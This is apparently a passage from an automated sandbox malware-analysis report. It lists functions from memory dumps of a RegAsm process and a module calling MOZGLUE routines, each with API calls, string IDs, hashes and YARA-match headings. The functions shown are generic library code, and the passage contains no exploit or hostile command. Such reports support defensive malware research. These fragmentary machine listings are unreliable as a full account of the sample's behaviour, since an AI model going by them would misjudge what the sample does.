                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2047719359-0
                                                                                                                                                                                                                                                    • Opcode ID: fa38b44fa8943abe85e6cc336e992d1ad78645f511039c41633dbcbe4eda722a
                                                                                                                                                                                                                                                    • Instruction ID: 29d89cf6891d55f697b364a117264a9bbf2da268e94667220d13072e256a9d90
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa38b44fa8943abe85e6cc336e992d1ad78645f511039c41633dbcbe4eda722a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A311CD30A08B45C7D7128F29C5047A2B3B5FFDA318F94972AE85953A01EBB0B5D6C798
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00419F89 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                                                                                                                                    • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                    • Instruction ID: ab7a3f04e2b47f322480c55f2a264373567276e68d74f6a7b0cd42830e15a4ba
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB11403240014ABBCF126E85CC55CEE3F66BB1D354B58841AFE2899131D73AC9B2AB85
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C713DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C6DF20E,?), ref: 6C713DF5
                                                                                                                                                                                                                                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C6DF20E,00000000,?), ref: 6C713DFC
                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C713E06
                                                                                                                                                                                                                                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C713E0E
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CC00: GetCurrentProcess.KERNEL32(?,?,6C6D31A7), ref: 6C70CC0D
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C6D31A7), ref: 6C70CC16
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2787204188-0
                                                                                                                                                                                                                                                    • Opcode ID: af9bb9b58883fd1c82123877c2f99cc71ea7a31f4037f894d44f60cc6f285aaa
                                                                                                                                                                                                                                                    • Instruction ID: c7fcd4a604af082ebc44206cb60e021625f1eff8e3665cef52f99081dd895d65
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af9bb9b58883fd1c82123877c2f99cc71ea7a31f4037f894d44f60cc6f285aaa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53F012B16002087BE700AB54DC49DBB376DDB46625F444031FD0857741DA75BE1996F7
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C722050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C72205B
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C72201B,?,?,?,?,?,?,?,6C721F8F,?,?), ref: 6C722064
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C72208E
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,00000000,?,6C72201B,?,?,?,?,?,?,?,6C721F8F,?,?), ref: 6C7220A3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2047719359-0
                                                                                                                                                                                                                                                    • Opcode ID: d93766411d90084b5d5da2e66e13227845cec36a8e0cc869b729baf9474ee207
                                                                                                                                                                                                                                                    • Instruction ID: 16bd8f63052c14ba53a183283bc9ac1123ae77a116e4a942af1f2c7047adad07
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d93766411d90084b5d5da2e66e13227845cec36a8e0cc869b729baf9474ee207
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76F0E9712007009BC7218F16D88CB6BBBF9EF86374F14012AE50687710DB75F906CB96
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C7220B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C7220B7
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(00000000,?,6C70FBD1,?,?,?,6C75F430,?,?,?,6C70FA2B,?,?,?,?,6C6E5407), ref: 6C7220C0
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C70FBD1,?,?,?,6C75F430,?,?,?,6C70FA2B,?,?,?,?,6C6E5407), ref: 6C7220DA
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,6C70FBD1,?,?,?,6C75F430,?,?,?,6C70FA2B,?,?,?,?,6C6E5407), ref: 6C7220F1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2047719359-0
                                                                                                                                                                                                                                                    • Opcode ID: 83890b7d46b875f26f6906144860980749b76def436fe476eab243acea2bfcf5
                                                                                                                                                                                                                                                    • Instruction ID: 10de330e780570fdaa44ed4d04e49902c57b65f0fd7076f7e9252f04c8a1eb42
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83890b7d46b875f26f6906144860980749b76def436fe476eab243acea2bfcf5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22E06531A006149BC7319F25980855EBBFDEF86324B54063AE54683B00DB79F94686D9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00406770 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?), ref: 004067BE
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 00406898
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                    • String ID: Ij@
                                                                                                                                                                                                                                                    • API String ID: 2574300362-1774497248
                                                                                                                                                                                                                                                    • Opcode ID: 201d4b15cacb334a9d933c4de49b59883996d4153d9f1caca22d6d1994d84e22
                                                                                                                                                                                                                                                    • Instruction ID: ced36099874cddaf488d3bca640f0d67fb667130f11008354c58d076cac131c3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 201d4b15cacb334a9d933c4de49b59883996d4153d9f1caca22d6d1994d84e22
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81418F72B016059BDB20DFA9D8807A7F3E8AF84305F1585BADC0ED7341E639E860CB94
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C7285B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C7285D3
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C728725
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                                                                                                                                                    • String ID: map/set<T> too long
                                                                                                                                                                                                                                                    • API String ID: 3720097785-1285458680
                                                                                                                                                                                                                                                    • Opcode ID: c408104c615040f7a65306ba5d3d0bd53aac01178b67071e0a464ceb0a2b55ba
                                                                                                                                                                                                                                                    • Instruction ID: a17561d16491c90290c5bf96c10cf900fcc72235d8f98a88c4f9f565203fcfca
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c408104c615040f7a65306ba5d3d0bd53aac01178b67071e0a464ceb0a2b55ba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4516875A04651CFD701CF28C284B55BBF1BF4A318F18C19AD8595BB52C37AE885CF92
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040F6E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040F755
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040F7A6
                                                                                                                                                                                                                                                      • Part of subcall function 0040F5F0: std::_Xinvalid_argument.LIBCPMT ref: 0040F60A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Xinvalid_argumentstd::_$memcpy
                                                                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                                                                    • API String ID: 2304785028-2556327735
                                                                                                                                                                                                                                                    • Opcode ID: 6032322df8137b7c0ace7a5fb7be56170bade7ba26089106d359810354a856df
                                                                                                                                                                                                                                                    • Instruction ID: cd7cfcf6191f4558dcc6d9c491793e6cbb091d43c4983432cc0d4f4ede4e12d7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6032322df8137b7c0ace7a5fb7be56170bade7ba26089106d359810354a856df
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 383127363106105BD7349D5CA88096BF3E9EBA1724B20093FF481D7BC1D7799C4983AA
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6DBD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C6DBDEB
                                                                                                                                                                                                                                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6DBE8F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                    • API String ID: 2811501404-4108050209
                                                                                                                                                                                                                                                    • Opcode ID: b4555b6b6bda809be600de8dc5788d426e58d362a5b1958ca16afe7ed820d09e
                                                                                                                                                                                                                                                    • Instruction ID: 77e4a6ad27c3cf890488053c885873e15ca9b8573fc5c2bee3a8b69db36328bb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4555b6b6bda809be600de8dc5788d426e58d362a5b1958ca16afe7ed820d09e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA41AE71909746CFC701CF28C481A9BB7F4EFCA388F018A1DF985A7615E730E9498B86
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040F3D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040F3E6
                                                                                                                                                                                                                                                      • Part of subcall function 0041F4C0: std::exception::exception.LIBCMT ref: 0041F4D5
                                                                                                                                                                                                                                                      • Part of subcall function 0041F4C0: __CxxThrowException@8.LIBCMT ref: 0041F4EA
                                                                                                                                                                                                                                                      • Part of subcall function 0041F4C0: std::exception::exception.LIBCMT ref: 0041F4FB
                                                                                                                                                                                                                                                    • memmove.MSVCRT ref: 0040F41F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • invalid string position, xrefs: 0040F3E1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                                                                                                                                                    • String ID: invalid string position
                                                                                                                                                                                                                                                    • API String ID: 1659287814-1799206989
                                                                                                                                                                                                                                                    • Opcode ID: 30ebef080f5374c1d8677aef1ee14dc20f9eac049e9a2dd6442995ade9399963
                                                                                                                                                                                                                                                    • Instruction ID: 1dd9a728655175608f2b5ef56bff4f13ce136c8bdba63e552082bb7918824b6e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30ebef080f5374c1d8677aef1ee14dc20f9eac049e9a2dd6442995ade9399963
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7601DB313002104BC335CDACED8055BB7AAEBD5714724493FE885D7B82D6B5EC4A83A9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C713CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C713D19
                                                                                                                                                                                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6C713D6C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _errnomozalloc_abort
                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                    • API String ID: 3471241338-2564639436
                                                                                                                                                                                                                                                    • Opcode ID: 1d933b7d6cc993edb127cb8f42565e5acf499b4910533c2a9ac31ba306fb4573
                                                                                                                                                                                                                                                    • Instruction ID: 614c64bd01e3d1db4440e70eb2e0e5cba9a5c29ff72694960a05d676538ea797
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d933b7d6cc993edb127cb8f42565e5acf499b4910533c2a9ac31ba306fb4573
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F112B71E18648DBDB009F69C9194EDB775EF96318B88C339DC8497A02EB30A584C350
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E4730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6E44B2,6C75E21C,6C75F7F8), ref: 6C6E473E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C6E474A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                    • String ID: GetNtLoaderAPI
                                                                                                                                                                                                                                                    • API String ID: 1646373207-1628273567
                                                                                                                                                                                                                                                    • Opcode ID: f5131b03ea5defa2af714125b236ceafce4eb9ebfd242da41b9efa76e1371ee1
                                                                                                                                                                                                                                                    • Instruction ID: 83a3a5cbf5882fcc5826241ab6cfd016b085832208dbeb6c8b36be0119315a24
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5131b03ea5defa2af714125b236ceafce4eb9ebfd242da41b9efa76e1371ee1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5014C753093589FDF00AFA788846297BB9FB8E311B49407AEA06C7740DF75E8018F95
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

